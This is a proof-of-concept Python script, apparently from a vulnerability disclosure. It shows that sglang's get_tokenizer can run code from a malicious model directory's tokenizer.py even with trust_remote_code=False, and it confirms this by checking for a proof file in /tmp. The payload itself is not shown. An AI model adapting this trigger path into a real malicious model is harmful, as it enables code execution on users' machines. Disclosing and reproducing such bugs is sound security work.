README.md
Rendering markdown...
"""Reproduce the bug via the call site sglang.launch_server uses
(TokenizerManager.__init__ -> get_tokenizer)."""
import importlib
import importlib.machinery
import os
import sys
import types
PROOF_FILE = "/tmp/sglang_poc_proof.txt"
MODEL_DIR = "/poc/malicious_model"
def stub_gpu_modules():
for mod in ['cuda_python', 'flashinfer', 'flashinfer_python', 'sglang_kernel',
'quack_kernels', 'xgrammar', 'torch_memory_saver', 'flash_attn_4',
'flash_attn', 'vllm', 'nvidia', 'nvidia.cutlass', 'nvidia_cutlass_dsl',
'sglang.srt.layers', 'openai_harmony', 'torchcodec',
'smg_grpc_servicer', 'apache_tvm_ffi', 'llguidance']:
if mod not in sys.modules:
fake = types.ModuleType(mod)
fake.__spec__ = importlib.machinery.ModuleSpec(mod, None)
fake.__version__ = "0.0.0"
sys.modules[mod] = fake
def main():
stub_gpu_modules()
if not os.path.isdir(MODEL_DIR):
print("[ERROR] Run setup_model.py first")
sys.exit(2)
if os.path.exists(PROOF_FILE):
os.remove(PROOF_FILE)
from sglang.srt.utils.hf_transformers_utils import get_tokenizer
# tokenizer_manager.py:320 calls get_tokenizer with the same arguments.
# ServerArgs default for trust_remote_code is False.
print(f"[*] get_tokenizer({MODEL_DIR!r}, tokenizer_mode='auto', trust_remote_code=False)")
try:
tokenizer = get_tokenizer(
MODEL_DIR,
tokenizer_mode="auto",
trust_remote_code=False,
)
result_type = type(tokenizer).__name__
except Exception as e:
result_type = f"EXCEPTION:{type(e).__name__}"
print(f"[*] Exception: {e}")
executed = os.path.exists(PROOF_FILE)
print(f"[*] returned: {result_type}")
print(f"[*] tokenizer.py executed: {executed}")
if executed:
print("\nCONFIRMED via TokenizerManager path.")
with open(PROOF_FILE) as f:
for line in f:
print(f" {line.rstrip()}")
sys.exit(0)
else:
print("\nNot triggered.")
sys.exit(1)
if __name__ == "__main__":
main()